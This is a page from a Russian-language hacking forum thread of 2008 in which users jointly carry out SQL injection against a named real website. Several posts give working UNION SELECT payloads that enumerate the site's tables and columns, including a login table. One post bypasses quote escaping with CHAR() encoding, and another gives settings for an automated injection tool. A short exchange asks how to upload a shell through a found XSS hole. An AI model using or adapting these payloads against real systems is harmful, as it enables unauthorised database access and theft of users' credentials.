HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3091  
Старый 28.08.2008, 18:55
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
С нами: 9443906

Репутация: 3313


По умолчанию

Цитата:
Сообщение от Mixon  
Здраствуйте,у меня вот возникла такая проблема,я вот нашел уязвимость на сайте,я могу через ссылку в страницу запихнуть любой код, и html и javascript,все что вожу,все отображается на странице,вот только одно то что php никаким образом там не идет,я какой скрипт в страницу не запыхиваю,то сервер его не обрабатывает,а в исходном коде страницы виден всесь скрипт,и есче там фильтр перед ' и " ставит \ как можно залить шелл на етот сайт,есле пхп код когда оказывается в странице не работает....кста,а просто пхп там работает,там весь сайт построин из пхп страниц,и есче,там сервер у них стоит LiteSpeed Web Server может кто подскажит что делать дальше???
ыыыы давно так не смеялся =)
через xss ты не сможешь исполнить php код =), только яваскрипт на стороне клиента. Скорей бы школа..
 
Ответить с цитированием

  #3092  
Старый 28.08.2008, 19:59
MaSTeR GэN
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
С нами: 9457097

Репутация: 133
По умолчанию

http://forum.antichat.ru/showpost.php?p=836658&postcount=3099
отвечю сам на cвой вопрос нужно юзать select TOP X * from table
выводит X стоку из table )
всем спасибо
 
Ответить с цитированием

  #3093  
Старый 29.08.2008, 01:06
Mixon
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
С нами: 9560218

Репутация: 238
По умолчанию

Цитата:
Сообщение от ChaaK  
ыыыы давно так не смеялся =)
через xss ты не сможешь исполнить php код =), только яваскрипт на стороне клиента. Скорей бы школа..
Гг,ето мне уже обьяснили)) Ну хоть веселее стало те))И за школу не боись,день рождение дьявола будет уже скоро, до 1 числа есче 3 дня.... есле бы 3 месяца...
 
Ответить с цитированием

  #3094  
Старый 29.08.2008, 01:33
zjuk@
Новичок
Регистрация: 04.09.2007
Сообщений: 13
С нами: 9834147

Репутация: 4
По умолчанию

Всем снова здоавствуйте, такая проблема:
при запросе
_http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2 &t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1+union+select+TABLE_NAME,2,3,4+FROM+INFORMATION_SCHEMA.TABLES+LI MIT+23,1/**/
получаем:
Цитата:
Unknown column 'cucca_logins' in 'where clause'
если попробовать проработать таблицу 'cucca_logins':

_http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2 &t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1+union+select+COLUMN_NAME,2,3,4+FROM+INFORMATION_SCHEMA.COLUMNS+ where+TABLE_NAME=cucca_logins+limit+23,1/**/
И опять получаем:
Цитата:
Unknown column 'cucca_logins' in 'where clause'
с cucca_users таже истории
Помогите пожалуйста, что я делаю не так?

Последний раз редактировалось zjuk@; 29.08.2008 в 01:41..
 
Ответить с цитированием

  #3095  
Старый 29.08.2008, 01:37
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами: 9976706

Репутация: 1934


По умолчанию

во-первых, /**/ ты открыл комментарий и тут же его закрыл. измени /**/ на /* или --
во-вторых, возми в ковычки во втором запросе cucca_logins
в-третьих, пропиши limit 1,10 для начала
 
Ответить с цитированием

  #3096  
Старый 29.08.2008, 01:49
zjuk@
Новичок
Регистрация: 04.09.2007
Сообщений: 13
С нами: 9834147

Репутация: 4
По умолчанию

Цитата:
Сообщение от AFoST  
во-первых, /**/ ты открыл комментарий и тут же его закрыл. измени /**/ на /* или --
во-вторых, возми в ковычки во втором запросе cucca_logins
в-третьих, пропиши limit 1,10 для начала
с кавычками меня послали, LIMIT в данном случае значения не имеет, а замена /**/ на -- ни к чему не привела.
 
Ответить с цитированием

  #3097  
Старый 29.08.2008, 02:05
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами: 10761096

Репутация: 27
По умолчанию

Скачай SIPT (http://forum.antichat.ru/thread24918-SIPT.html)
Настройки поставь
Код:
URL=http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2&t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1{SQLINJ}
Key=Unknown column 
Search key by=Found
Close SQL=(ничего)
и все. /* тут вообще не надо и без него работает.
у меня работает и все находит.

Последний раз редактировалось Grema; 29.08.2008 в 02:21..
 
Ответить с цитированием

  #3098  
Старый 29.08.2008, 02:08
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами: 10172486

Репутация: 874
По умолчанию

Все работает. Под чаром cucca_logins , так как кавчки экранирует
Цитата:
http://www.lacucaracha.ee/index.php?mod=menyy&kat=-4+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.columns+where+table_name=CHAR(99, 117,99,99,97,95,108,111,103,105,110,115)--
 
Ответить с цитированием

  #3099  
Старый 29.08.2008, 02:17
zjuk@
Новичок
Регистрация: 04.09.2007
Сообщений: 13
С нами: 9834147

Репутация: 4
По умолчанию

Цитата:
Сообщение от Red_Red1  
Все работает. Под чаром cucca_logins , так как кавчки экранирует
спасибо большое, оказывается в запросе очипятывался =)
Цитата:
Скачай SIPT (http://forum.antichat.ru/thread24918-SIPT.html)
Настройки поставь
Спасибо есть, тока при поиске столбцов вылетает =( а при поиске таблиц нормально.
Пасибки всем
 
Ответить с цитированием

  #3100  
Старый 29.08.2008, 02:22
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами: 10761096

Репутация: 27
По умолчанию

Цитата:
Сообщение от zjuk@  
Спасибо есть, тока при поиске столбцов вылетает =( а при поиске таблиц нормально.
попробуй с моими настройками может прокатит, то у меня столбцы показывает. Если не получиться, говори в какой таблице столбцы надо
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.